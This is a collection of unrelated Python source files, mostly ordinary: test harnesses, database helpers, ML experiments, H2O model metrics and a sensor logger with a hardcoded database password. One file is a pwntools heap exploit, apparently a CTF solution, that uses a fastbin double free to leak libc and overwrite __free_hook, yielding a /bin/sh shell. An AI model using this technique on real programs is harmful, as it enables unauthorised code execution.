# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""argparse.ArgumentParser for the mini_installer test suite.
The provided parser is based on that created by typ.
"""
import typ
def ArgumentParser(host=None):
"""Returns an argparse.ArgumentParser for the mini_installer test suite.
Args:
host: A typ.Host to pass to typ's argument parser.
Returns:
A filled out ArgumentParser instance.
"""
parser = typ.ArgumentParser(host)
group = parser.add_argument_group(title='run_mini_installer_tests')
group.add_argument('--force-clean',
action='store_true',
default=False,
help='Force cleaning existing installations')
group.add_argument(
'--output-dir',
metavar='DIR',
help='Directory into which crash dumps and other output '
'files are to be written')
group.add_argument('--installer-path',
default='mini_installer.exe',
metavar='FILENAME',
help='The path of the installer.')
group.add_argument('--previous-version-installer-path',
default='previous_version_mini_installer.exe',
metavar='FILENAME',
help='The path of the previous version installer.')
group.add_argument('--chromedriver-path',
default='chromedriver.exe',
help='The path to chromedriver.')
group.add_argument('--config',
default='config.config',
metavar='FILENAME',
help='Path to test configuration file')
return parser
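# Illustrative usage sketch (flags and paths are made up; assumes typ can construct a default Host):
#   parser = ArgumentParser()
#   args = parser.parse_args(['--force-clean', '--installer-path', 'out/mini_installer.exe'])
#   print(args.force_clean, args.installer_path)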
|
import random
import sys
import pandas as pd
import numpy as np
from sklearn.linear_model import LinearRegression
from sklearn.tree import DecisionTreeRegressor
from sklearn.svm import SVR
from data_prepare import make_data,make_data_2th
from algo_utils import *
np.random.seed(0)
random.seed(0)
# global params
#
train_task_rows = 2000
test_task_rows = 2000
true_C = 5 # task id of the test task
base_learner = DecisionTreeRegressor # which base learner to use
# make data
train = make_data(9,train_task_rows)
test = make_data(1,test_task_rows,alphas=[true_C])
train = make_data_2th(10, 2000, data_scene=[4,4,4,12,1,2,1])
test = make_data_2th(1, 2000, data_scene=[4,4,4,12,1,2,1])
# OLS linear regression
print(" *** baseline 全局模型 *** ")
# 训练模型
model = prediction_pipeline(train,base_learner)
# evaluate the model
_,mse = prediction_pipeline(test,fitted=model,output="y_hat")
print("MSE")
print(mse)
if base_learner == LinearRegression:
print("系数:",model.coef_)
print("截距项:",model.intercept_)
basemse = mse
# the method proposed in this paper
print("=" * 88)
print(" *** proposed method: new model *** ")
# train the model
newmodel = prediction_pipeline(train,ProModel,task_rows=train_task_rows,
base_learner = base_learner,distance_metrics = muti_js_micro,verbose = True)
# evaluate the model
r,mse = prediction_pipeline(test,fitted=newmodel,output="y_hat")
mse_2 = mse
print("MSE")
print(mse)
print("_scores",newmodel._scores)
print("_task_num",newmodel.task_num)
print("base_mse",basemse)
if base_learner == LinearRegression:
for i in range(9):
print("第" + str(i) +"个任务:系数:",newmodel._base_learners[i].coef_)
print(newmodel._X[0].shape)
print(newmodel._X[0].columns)
print("=" * 88)
# single-task model
print(" *** single-task model *** ")
model = prediction_pipeline(train[0 + int(2000 * (true_C-1)):2000 + int(2000 * (true_C-1))],LinearRegression)
_,mse = prediction_pipeline(test,fitted=model,output="y_hat")
mse_3 = mse
print("MSE")
print(mse)
print("系数:",model.coef_)
print("/")
print("全局模型,本文模型,真实单任务模型的mse分别为:",basemse,",",mse_2,",",mse_3)
print("=" * 88) |
from .group_chat_bot import WeGroupChatBot as GroupChatBot, WeGroupChatBots as GroupChatBots
|
from sqlalchemy import Column, create_engine, DateTime, String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import scoped_session, sessionmaker
Base = declarative_base()
class Pet(Base):
__tablename__ = "pets"
id = Column(String(20), primary_key=True)
name = Column(String(100))
animal_type = Column(String(20))
created = Column(DateTime())
def update(self, id=None, name=None, animal_type=None, tags=None, created=None):
if name is not None:
self.name = name
if animal_type is not None:
self.animal_type = animal_type
if created is not None:
self.created = created
def dump(self):
return {k: v for k, v in vars(self).items() if not k.startswith("_")}
def init_db(uri):
engine = create_engine(uri, convert_unicode=True)
db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base.query = db_session.query_property()
Base.metadata.create_all(bind=engine)
return db_session
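# Illustrative usage sketch (URI and field values are made up):
#   from datetime import datetime
#   db_session = init_db("sqlite:///pets.db")
#   db_session.add(Pet(id="1", name="Rex", animal_type="dog", created=datetime.utcnow()))
#   db_session.commit()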
|
from datetime import date, datetime
from pynonymizer.database.exceptions import UnsupportedColumnStrategyError
from pynonymizer.strategy.update_column import UpdateColumnStrategyTypes
from pynonymizer.fake import FakeDataType
"""
All Static query generation functions
"""
_FAKE_COLUMN_TYPES = {
FakeDataType.STRING: "VARCHAR(65535)",
FakeDataType.DATE: "DATE",
FakeDataType.DATETIME: "DATETIME",
FakeDataType.INT: "INT"
}
# Random text function
_RAND_MD5 = "md5(random()::text)"
def _get_sql_type(data_type):
return _FAKE_COLUMN_TYPES[data_type]
def _get_column_subquery(seed_table_name, column_strategy):
if column_strategy.strategy_type == UpdateColumnStrategyTypes.EMPTY:
return "('')"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.UNIQUE_EMAIL:
return f"( SELECT CONCAT({_RAND_MD5}, '@', {_RAND_MD5}, '.com') WHERE \"updatetarget\"=\"updatetarget\" )"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.UNIQUE_LOGIN:
return f"( SELECT {_RAND_MD5} WHERE \"updatetarget\"=\"updatetarget\" )"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.FAKE_UPDATE:
# Add a dummy "updatetarget" where clause to fool the postgres optimizer into running the subquery on every row
# instead of once for the whole query
# See Also https://www.simononsoftware.com/problem-with-random-in-postgresql-subselect/
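# Illustrative result for a fake column with qualifier "first_name" and seed table "seed_table":
#   ( SELECT first_name FROM seed_table WHERE "updatetarget"="updatetarget" ORDER BY RANDOM() LIMIT 1)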
return f"( SELECT {column_strategy.qualifier} FROM {seed_table_name} WHERE \"updatetarget\"=\"updatetarget\" ORDER BY RANDOM() LIMIT 1)"
elif column_strategy.strategy_type == UpdateColumnStrategyTypes.LITERAL:
return column_strategy.value
else:
raise UnsupportedColumnStrategyError(column_strategy)
def _escape_sql_value(value):
"""
return a sql-ified version of a seed column's value
Normally this defines the stringification of datatypes and escaping for strings
"""
if isinstance(value, (str, datetime, date)):
return "'" + str(value).replace("'", "''") + "'"
else:
return str(value)
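# Examples of the escaping behaviour (return values shown as raw SQL fragments):
#   _escape_sql_value("O'Brien")  ->  'O''Brien'
#   _escape_sql_value(42)         ->  42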
def _get_qualified_table_name(schema, table):
return f"{schema}.{table}" if schema else table
def get_truncate_table(table_strategy):
return f"TRUNCATE TABLE {_get_qualified_table_name(table_strategy.schema, table_strategy.table_name)} CASCADE;"
# postgres truncates can cascade and are faster than unqualified deletes
# https://www.postgresql.org/docs/9.1/sql-truncate.html
def get_delete_table(table_strategy):
return f"TRUNCATE TABLE {_get_qualified_table_name(table_strategy.schema, table_strategy.table_name)} CASCADE;"
def get_create_seed_table(table_name, qualifier_map):
if len(qualifier_map) < 1:
raise ValueError("Cannot create a seed table with no columns")
create_columns = [f"{qualifier} {_get_sql_type(strategy.data_type)}" for qualifier, strategy in qualifier_map.items()]
return "CREATE TABLE {} ({});".format(table_name, ",".join(create_columns) )
def get_drop_seed_table(table_name):
return f"DROP TABLE IF EXISTS {table_name};"
def get_insert_seed_row(table_name, qualifier_map):
column_names = ",".join( [f"{qualifier}" for qualifier in qualifier_map.keys()] )
column_values = ",".join( [f"{_escape_sql_value(strategy.value)}" for strategy in qualifier_map.values()] )
return "INSERT INTO {}({}) VALUES ({});".format(table_name, column_names, column_values)
def get_create_database(database_name):
return f"CREATE DATABASE {database_name};"
def get_drop_database(database_name):
return [
# terminate other connections so we can drop
f"SELECT pid, pg_terminate_backend(pid) FROM pg_stat_activity WHERE datname = '{database_name}' AND pid != pg_backend_pid();",
f"DROP DATABASE IF EXISTS {database_name};"
]
def get_update_table(seed_table_name, update_table_strategy):
# group on where_condition
# build lists of update statements based on the where
output_statements = []
where_update_statements = {}
for where, column_map in update_table_strategy.group_by_where().items():
where_update_statements[where] = []
for column_name, column_strategy in column_map.items():
where_update_statements[where].append("{} = {}".format(
column_name,
_get_column_subquery(seed_table_name, column_strategy))
)
assignments = ",".join( where_update_statements[where] )
where_clause = f" WHERE {where}" if where else ""
output_statements.append(
"UPDATE {} AS \"updatetarget\" SET {}{};".format(
_get_qualified_table_name(update_table_strategy.schema, update_table_strategy.table_name),
assignments,
where_clause
)
)
return output_statements
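# Illustrative output of get_update_table for a single where-group containing one EMPTY "notes"
# column and no where clause (schema/table/column names are made up):
#   UPDATE public.users AS "updatetarget" SET notes = ('');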
# TODO: fix for postgres
def get_dumpsize_estimate(database_name):
return "SELECT 1;"
|
#from __future__ import print_function
import json
from flask import Flask, request, redirect, make_response
app = Flask(__name__)
app.debug = True
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def index(path):
s = "<html><pre>"
f = "</pre></html>"
sep = '\n============================\n'
p = "Path: " + path + "\n"
arg = str(json.dumps(request.args, sort_keys=True, indent=4, separators=(',', ': ')))
dat = str(request.data)
final = s + p + sep + str(request.headers) + sep + arg + sep + dat + f
return(final)
if __name__ == '__main__':
app.run(port=3001,host='0.0.0.0')
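# Illustrative check against the running server (path and query string are made up):
#   curl "http://localhost:3001/some/path?x=1"
# returns an HTML <pre> dump of the request path, headers, query args and raw body.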
|
#!/usr/bin/env python
from minibus import MiniBusTwistedClient
import sys
sys.dont_write_bytecode = True
class ServiceServer(MiniBusTwistedClient):
def __init__(self):
MiniBusTwistedClient.__init__(self, name="ServiceServer")
self.service_func_server("echoback", { }, { }, self.echo)
def echo(self, data):
print "got", data
if data[0].lower() == "x":
raise Exception("I don't like x")
return "I said '%s'" % data
if __name__ == "__main__":
server = ServiceServer()
server.exec_()
|
# This program is free software; you can redistribute it and/or modify it under
# the terms of the (LGPL) GNU Lesser General Public License as published by the
# Free Software Foundation; either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Library Lesser General Public License
# for more details at ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( [email protected] )
"""
Provides classes for handling soap multirefs.
"""
from suds import *
from suds.sax.element import Element
soapenc = (None, 'http://schemas.xmlsoap.org/soap/encoding/')
class MultiRef:
"""
Resolves and replaces multirefs.
@ivar nodes: A list of non-multiref nodes.
@type nodes: list
@ivar catalog: A dictionary of multiref nodes by id.
@type catalog: dict
"""
def __init__(self):
self.nodes = []
self.catalog = {}
def process(self, body):
"""
Process the specified soap envelope body and replace I{multiref} node
references with the contents of the referenced node.
@param body: A soap envelope body node.
@type body: L{Element}
@return: The processed I{body}
@rtype: L{Element}
"""
self.nodes = []
self.catalog = {}
self.build_catalog(body)
self.update(body)
body.children = self.nodes
return body
def update(self, node):
"""
Update the specified I{node} by replacing the I{multiref} references with
the contents of the referenced nodes and remove the I{href} attribute.
@param node: A node to update.
@type node: L{Element}
@return: The updated node
@rtype: L{Element}
"""
self.replace_references(node)
for c in node.children:
self.update(c)
return node
def replace_references(self, node):
"""
Replace the I{multiref} references with the contents of the
referenced nodes and remove the I{href} attribute. Warning: since
the I{ref} is not cloned, its children are appended as-is rather
than copied.
@param node: A node to update.
@type node: L{Element}
"""
href = node.getAttribute('href')
if href is None:
return
id = href.getValue()
ref = self.catalog.get(id)
if ref is None:
import logging
log = logging.getLogger(__name__)
log.error('soap multiref: %s, not-resolved', id)
return
node.append(ref.children)
node.setText(ref.getText())
for a in ref.attributes:
if a.name != 'id':
node.append(a)
node.remove(href)
def build_catalog(self, body):
"""
Create the I{catalog} of multiref nodes by id and the list of
non-multiref nodes.
@param body: A soap envelope body node.
@type body: L{Element}
"""
for child in body.children:
if self.soaproot(child):
self.nodes.append(child)
id = child.get('id')
if id is None: continue
key = '#%s' % id
self.catalog[key] = child
def soaproot(self, node):
"""
Get whether the specified I{node} is a soap encoded root.
This is determined by examining @soapenc:root='1'.
The node is considered to be a root when the attribute
is not specified.
@param node: A node to evaluate.
@type node: L{Element}
@return: True if a soap encoded root.
@rtype: bool
"""
root = node.getAttribute('root', ns=soapenc)
if root is None:
return True
else:
return ( root.value == '1' )
|
"""
Main module of the server file
"""
# 3rd party modules
from flask import render_template
# local modules
import app_config
# Get the application instance
connex_app = app_config.connex_app
# Read the swagger.yml file to configure the endpoints
connex_app.add_api("swagger.yaml", strict_validation=True,
pythonic_params=True)
# create a URL route in our application for "/"
@connex_app.route("/")
def home():
"""
This function just responds to the browser URL
localhost:5000/
:return: the rendered template "home.html"
"""
return render_template("home.html")
if __name__ == "__main__":
connex_app.run(debug=True)
|
#!/usr/bin/env python
from pwn import *
def add_note(title, content_size, content):
p.sendline('1')
p.recvuntil('please input title: ')
p.send(title)
p.recvuntil('please input content size: ')
p.sendline(str(content_size))
p.recvuntil('please input content: ')
p.send(content)
def view_note(title):
p.sendline('2')
p.recvuntil('please input note title: ')
p.send(title)
def edit_note(title, content):
p.sendline('3')
p.recvuntil('please input note title: ')
p.send(title)
p.recvuntil('please input new content: ')
p.send(content)
def delete_note(title):
p.sendline('4')
p.recvuntil('please input note title: ')
p.send(title)
with context.quiet:
p = process('./program', env = {'LD_PRELOAD': './libc-2.23.so'})
p.recvuntil('5. Exit\n')
# allocates fastbin_1 and fastbin_2
add_note('a' * 8, 24, 'a' * 24)
# frees fastbin_1 and fastbin_2
delete_note('a' * 8)
# frees fastbin_1 and fastbin_2 again
# this puts fastbin_1 and fastbin_2 address on the free list again
# https://github.com/shellphish/how2heap/blob/master/fastbin_dup.c
delete_note('a' * 8)
# allocates fastbin_3 and fastbin_4
# we provide an all-zero title, which makes the fd pointer = 0
add_note('\x00' * 8, 24, 'b' * 24)
# allocates fastbin_5 and smallbin_1
# this causes fastbin_5 overlaps with fastbin_3
# both notes are pointing to the same location
add_note('c' * 8, 256, 'c' * 256)
# allocates fastbin_6 and fastbin_7
# prevents smallbin_1 being consolidated into the top chunk
add_note('d' * 8, 24, 'd' * 24)
# frees fastbin_5
# frees smallbin_1 and populate its fd and bk pointers with libc addresses
delete_note('c' * 8)
# print content of fastbin_3 since its content is the same as fastbin_5
view_note('\x00' * 8)
# leak libc address
p.recvuntil('note content: ')
libc_base = u64(p.recv(6) + '\x00\x00') - 0x3c4b78
print('libc base: {}'.format(hex(libc_base)))
# frees fastbin_6 and fastbin_7
delete_note('d' * 8)
# allocates fastbin_8 and smallbin_2
# smallbin_1 and smallbin_2 overlap
add_note('e' * 8, 256, 'e' * 256)
# allocates fastbin_9 and fastbin_10
# fastbin_10 and fastbin_5 overlap
# basically, fastbin_5 is the content of this note
# therefore, we can overwrite the content address with __free_hook
add_note('f' * 8, 24, '\x00' * 8 + p64(24) + p64(libc_base + 0x3c67a8))
# we then overwrite __free_hook with the address of one_gadget's execve
# 0x4526a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
edit_note('\x00' * 7 + '\n', p64(libc_base + 0x4526a) + '\n')
# trigger the __free_hook by freeing a note
delete_note('\x00' * 8)
p.interactive()
|
from torch.utils.data import DataLoader
from typing import NamedTuple
class Loaders(NamedTuple):
"""
Container for the data loaders
"""
train: DataLoader
test: DataLoader
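# Illustrative construction (train_ds/test_ds are made-up Dataset instances):
#   loaders = Loaders(train=DataLoader(train_ds, batch_size=32, shuffle=True),
#                     test=DataLoader(test_ds, batch_size=32))
#   for batch in loaders.train: ...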
|
"""
day4-part1.py
Created on 2020-12-04
Updated on 2020-12-09
Copyright © Ryan Kan
"""
# INPUT
with open("input.txt", "r") as f:
contents = f.read()[:-1]
passports = [passport.replace("\n", " ") for passport in contents.split("\n\n")]
f.close()
# COMPUTATION
# Process each passport
noValid = 0
for passport in passports:
# Convert each passport into a dictionary of sorts
dictionary = {}
entries = passport.split(" ")
for entry in entries:
key, value = entry.split(":")
dictionary[key] = value
# Remove the "cid" key since it is optional
try:
dictionary.pop("cid")
except KeyError:
pass
# Check if all required fields are there
if set(dictionary.keys()) == {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}:
noValid += 1
# OUTPUT
print(noValid)
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.orchestration.kubeflow.base_component."""
import json
import os
from absl import logging
from kfp import dsl
import tensorflow as tf
from tfx.components.example_gen.csv_example_gen import component as csv_example_gen_component
from tfx.components.statistics_gen import component as statistics_gen_component
from tfx.orchestration import data_types
from tfx.orchestration import pipeline as tfx_pipeline
from tfx.orchestration.kubeflow import base_component
from tfx.orchestration.kubeflow.proto import kubeflow_pb2
from tfx.proto.orchestration import pipeline_pb2
from ml_metadata.proto import metadata_store_pb2
class BaseComponentTest(tf.test.TestCase):
maxDiff = None # pylint: disable=invalid-name
_test_pipeline_name = 'test_pipeline'
def setUp(self):
super().setUp()
example_gen = csv_example_gen_component.CsvExampleGen(
input_base='data_input')
statistics_gen = statistics_gen_component.StatisticsGen(
examples=example_gen.outputs['examples']).with_id('foo')
pipeline = tfx_pipeline.Pipeline(
pipeline_name=self._test_pipeline_name,
pipeline_root='test_pipeline_root',
metadata_connection_config=metadata_store_pb2.ConnectionConfig(),
components=[example_gen, statistics_gen],
)
test_pipeline_root = dsl.PipelineParam(name='pipeline-root-param')
self._metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
self._metadata_config.mysql_db_service_host.environment_variable = 'MYSQL_SERVICE_HOST'
self._tfx_ir = pipeline_pb2.Pipeline()
with dsl.Pipeline('test_pipeline'):
self.component = base_component.BaseComponent(
component=statistics_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[]
)
self.tfx_component = statistics_gen
def testContainerOpArguments(self):
# TODO(hongyes): make the whole args list in one golden file to keep
# source of truth in same file.
source_data_dir = os.path.join(os.path.dirname(__file__), 'testdata')
with open(os.path.join(source_data_dir,
'component.json')) as component_json_file:
formatted_component_json = json.dumps(
json.load(component_json_file), sort_keys=True)
expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'foo',
]
try:
self.assertEqual(
self.component.container_op.arguments[:len(expected_args)],
expected_args)
except AssertionError:
# Print out full arguments for debugging.
logging.error('==== BEGIN CONTAINER OP ARGUMENT DUMP ====')
logging.error(json.dumps(self.component.container_op.arguments, indent=2))
logging.error('==== END CONTAINER OP ARGUMENT DUMP ====')
raise
def testContainerOpName(self):
self.assertEqual('foo', self.tfx_component.id)
self.assertEqual('foo', self.component.container_op.name)
class BaseComponentWithPipelineParamTest(tf.test.TestCase):
"""Test the usage of RuntimeParameter."""
maxDiff = None # pylint: disable=invalid-name
_test_pipeline_name = 'test_pipeline'
def setUp(self):
super().setUp()
example_gen_output_config = data_types.RuntimeParameter(
name='example-gen-output-config', ptype=str)
example_gen = csv_example_gen_component.CsvExampleGen(
input_base='data_root', output_config=example_gen_output_config)
statistics_gen = statistics_gen_component.StatisticsGen(
examples=example_gen.outputs['examples']).with_id('foo')
test_pipeline_root = dsl.PipelineParam(name='pipeline-root-param')
pipeline = tfx_pipeline.Pipeline(
pipeline_name=self._test_pipeline_name,
pipeline_root='test_pipeline_root',
metadata_connection_config=metadata_store_pb2.ConnectionConfig(),
components=[example_gen, statistics_gen],
)
self._metadata_config = kubeflow_pb2.KubeflowMetadataConfig()
self._metadata_config.mysql_db_service_host.environment_variable = 'MYSQL_SERVICE_HOST'
self._tfx_ir = pipeline_pb2.Pipeline()
with dsl.Pipeline('test_pipeline'):
self.example_gen = base_component.BaseComponent(
component=example_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[example_gen_output_config])
self.statistics_gen = base_component.BaseComponent(
component=statistics_gen,
depends_on=set(),
pipeline=pipeline,
pipeline_root=test_pipeline_root,
tfx_image='container_image',
kubeflow_metadata_config=self._metadata_config,
tfx_ir=self._tfx_ir,
pod_labels_to_attach={},
runtime_parameters=[]
)
self.tfx_example_gen = example_gen
self.tfx_statistics_gen = statistics_gen
def testContainerOpArguments(self):
# TODO(hongyes): make the whole args list in one golden file to keep
# source of truth in same file.
source_data_dir = os.path.join(os.path.dirname(__file__), 'testdata')
statistics_gen_expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'foo',
'--tfx_ir',
'{}',
]
example_gen_expected_args = [
'--pipeline_root',
'{{pipelineparam:op=;name=pipeline-root-param}}',
'--kubeflow_metadata_config',
'{\n'
' "mysql_db_service_host": {\n'
' "environment_variable": "MYSQL_SERVICE_HOST"\n'
' }\n'
'}',
'--node_id',
'CsvExampleGen',
'--tfx_ir',
'{}',
'--runtime_parameter',
'example-gen-output-config=STRING:{{pipelineparam:op=;name=example-gen-output-config}}',
]
try:
self.assertEqual(
self.statistics_gen.container_op
.arguments,
statistics_gen_expected_args)
self.assertEqual(
self.example_gen.container_op.arguments,
example_gen_expected_args)
except AssertionError:
# Print out full arguments for debugging.
logging.error('==== BEGIN STATISTICSGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error(
json.dumps(self.statistics_gen.container_op.arguments, indent=2))
logging.error('==== END STATISTICSGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error('==== BEGIN EXAMPLEGEN CONTAINER OP ARGUMENT DUMP ====')
logging.error(
json.dumps(self.example_gen.container_op.arguments, indent=2))
logging.error('==== END EXAMPLEGEN CONTAINER OP ARGUMENT DUMP ====')
raise
def testContainerOpName(self):
self.assertEqual('foo', self.tfx_statistics_gen.id)
self.assertEqual('foo', self.statistics_gen.container_op.name)
if __name__ == '__main__':
tf.test.main()
|
from signal import signal, SIGINT
from sys import exit
import psycopg2
import airly
from getkey import getkey, keys
import write_on_display
import bme280
import smbus2
import datetime
from time import sleep
conn = psycopg2.connect(
host="localhost",
database="weather_station",
user="dev",
password="d3v")
insert_measure_sql = """
insert into measure (temperature, pressure, humidity, outside_temp, pm_2_5, pm_10, caqi, meter_id)
values (%s, %s, %s, %s, %s, %s, %s, %s)
returning id
"""
airly_last_read = datetime.datetime.now()-datetime.timedelta(minutes=30)
caqi = 0
port = 1
address = 0x76
bus = smbus2.SMBus(port)
bme280.load_calibration_params(bus, address)
write_on_display.write('Initiating\nsystems...')
sleep(1)
def handler(signal_received, frame):
# Handle any cleanup here
print('SIGINT or CTRL-C detected. Exiting gracefully')
write_on_display.clear()
f.close()
conn.close()
exit(0)
if __name__ == '__main__':
signal(SIGINT, handler)
while True:
if airly_last_read < datetime.datetime.now()-datetime.timedelta(minutes=20):
airlyData = airly.getData()
caqiRaw = airlyData["current"]["indexes"][0]["value"]
caqi = round(caqiRaw)
outside_temp = airlyData["current"]["values"][5]["value"]
pm_2_5 = airlyData["current"]["values"][1]["value"]
pm_10 = airlyData["current"]["values"][2]["value"]
airly_last_read = datetime.datetime.now()
bme280_data = bme280.sample(bus, address)
humidity = round(bme280_data.humidity)
humidity2 = bme280_data.humidity
pressure = round(bme280_data.pressure)
pressure2 = bme280_data.pressure
temperature = round(bme280_data.temperature)
temperature2 = bme280_data.temperature
msg = f'H:{humidity}% {temperature}\u00b0C\nhPa:{pressure}\nCAQI:{caqi} {outside_temp}\u00b0C'
write_on_display.write(msg)
time = datetime.datetime.now()
f = open("weather.log", "a")
f.write(f'{time};{humidity2};{pressure2};{temperature2};{caqiRaw};{outside_temp};{pm_2_5};{pm_10}\n')
cur = conn.cursor()
cur.execute(insert_measure_sql, (temperature2, pressure2, humidity2, outside_temp, pm_2_5, pm_10, caqiRaw, 2))
conn.commit()
cur.close()
f.close()
sleep(60*5)
|
from django.test import TestCase
from medicus import models as medi_models
class TestRating(TestCase):
def test_000_new_rating(self):
country = medi_models.Country.objects.create(name='Rumania')
province = medi_models.Province.objects.create(country=country, name='bla')
postal_code = medi_models.PostalCode.objects.create(postal_code=1234)
city = medi_models.City.objects.create(postal_code=postal_code, country=country, province=province, name='some city')
address = medi_models.Address.objects.create(
city=city,
country=country,
street='some_street',
house_number='123'
)
profession = medi_models.Profession.objects.create(name='bla')
doc = medi_models.Doctor.objects.create(name='dr. alibert', address=address, profession=profession)
rating = medi_models.Rating(treatment=1,
empathy=1,
price=1,
waiting_time=1,
doctor=doc)
rating.full_clean()
rating.save()
self.assertEqual(rating.general_score, 1)
|
"""
Binomial Models
"""
from metrics_base import *
class H2OBinomialModel(ModelBase):
"""
Class for Binomial models.
"""
def __init__(self, dest_key, model_json):
"""
Create a new binomial model.
"""
super(H2OBinomialModel, self).__init__(dest_key, model_json,H2OBinomialModelMetrics)
def F1(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F1 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F1 value for the training data.
:param valid: If valid is True, then return the F1 value for the validation data.
:param xval: If xval is True, then return the F1 value for the cross validation data.
:return: The F1 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f1", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def F2(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F2 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F2 value for the training data.
:param valid: If valid is True, then return the F2 value for the validation data.
:param xval: If xval is True, then return the F2 value for the cross validation data.
:return: The F2 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f2", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def F0point5(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the F0.5 for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the F0point5 value for the training data.
:param valid: If valid is True, then return the F0point5 value for the validation data.
:param xval: If xval is True, then return the F0point5 value for the cross validation data.
:return: The F0point5 for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("f0point5", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def accuracy(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the accuracy for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the accuracy value for the training data.
:param valid: If valid is True, then return the accuracy value for the validation data.
:param xval: If xval is True, then return the accuracy value for the cross validation data.
:return: The accuracy for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else v.metric("accuracy", thresholds=thresholds)
return m.values()[0] if len(m) == 1 else m
def error(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the error for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the error value for the training data.
:param valid: If valid is True, then return the error value for the validation data.
:param xval: If xval is True, then return the error value for the cross validation data.
:return: The error for this binomial model.
"""
tm = ModelBase._get_metrics(self, train, valid, xval)
m = {}
for k,v in zip(tm.keys(),tm.values()): m[k] = None if v is None else [[acc[0],1-acc[1]] for acc in v.metric("accuracy", thresholds=thresholds)]
return m.values()[0] if len(m) == 1 else m
def precision(self, thresholds=None, train=False, valid=False, xval=False):
"""
Get the precision for a set of thresholds.
If all are False (default), then return the training metric value.
If more than one option is set to True, then return a dictionary of metrics where the keys are "train", "valid",
and "xval"
:param thresholds: thresholds parameter must be a list (i.e. [0.01, 0.5, 0.99]). If None, then the thresholds in this set of metrics will be used.
:param train: If train is True, then return the precision value for the training data.
:param valid: If valid is True, then return the precision value for the validation data.
:param xval: If xval is True, then return the precision value for the cross validation data.
:return: The precision for this binomial model.
"""
